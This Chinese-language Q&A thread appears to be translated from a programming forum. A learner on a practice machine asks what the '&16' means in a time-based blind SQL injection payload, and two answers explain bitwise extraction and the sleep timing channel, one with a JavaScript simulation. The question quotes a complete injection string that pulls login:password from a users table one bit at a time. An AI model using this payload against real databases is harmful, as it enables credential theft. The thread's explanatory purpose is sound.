&16 在这个 MySQL 查询中做了什么？

Question

我有这个MySQL查询，唯一看不懂的就是这部分&16

if((select ascii(substring((select concat(login,':',password) from users limit 0,1),2,1))&16),sleep(2),0)

我正在尝试解决我有盲 SQL 注入的机器：

这是查找登录名和密码的整个有效负载，逐个字符：

hacker' or if((select ascii(substring((select concat(login,':',password) from users limit 0,1),2,1))&16),sleep(2),0) and '1'='1

实现 16 值的代码由 {2**bit} 完成 位值范围为 0 到 7

Answer 1

此人似乎正在尝试检查用户名 + 密码的第二个字母是否属于以下 ascii 字符范围之一：

16 - 31
48 - 63
80 - 95
112 - 127
144 - 159
176 - 191
208 - 223
240 - 255

我相信您会发现对于用户名 + 密码的每个字母、1、2、4、... 128 之间的每个值以及用户表中的每一行都有类似的尝试。

现在，这就是他真正想要做的事情：

您需要 256 次尝试使用蛮力猜测一个字母，即您检查 ascii 代码 0x00 - 0xFF。但是，如果bitwise AND 操作可用，您可以一次检查一位并准确猜出 8 次字母。这是他正在尝试做的 JavaScript 实现：

// assume this is the character from substring(..., 2, 1)
let substring = String.fromCharCode(Math.random() * 256);

// ...and this holds the ascii value of the character he's guessing
let cracked = 0;

// i represents the values used in the "&" operation
for (let i = 1; i <= 128; i <<= 1) {
  console.log(`i = ${i.toString().padStart(3, " ")} (0b${i.toString(2).padStart(8, "0")})`);

  if (substring.charCodeAt(0) & i) {
    // when "&" operation results in a truthy value he spots a 2 second delay
    // ...and updates the guessed value
    cracked |= i;
  }
}

console.log(`that substring: ${substring}`);
console.log(`cracked string: ${String.fromCharCode(cracked)} (${cracked})`);

Answer 2

它从users 表中的单行中的单个字符中提取单个位。

如果成功，则攻击者知道他们可以查询您的用户和密码。然后他们可以结合许多其他查询从其他字符中提取其他位。一旦他们掌握了所有这些信息，他们就可以在他们的计算机上将这些信息拼凑起来，并重建完整的用户名和密码。

为什么他们会以这种奇怪的方式，一次一点？

因为这样他们不必返回数据来知道它是什么。他们可以一次检查一个位，这会影响它运行的查询的结果。他们检查了：

hacker' or if(...,sleep(2),0)

如果位为 1，这将导致查询延迟 2 秒，如果位为 0，则不会延迟。他们可以对结果进行计时，从而知道是否设置了特定位。一旦他们对所有位执行此操作，他们就知道完整的字符串。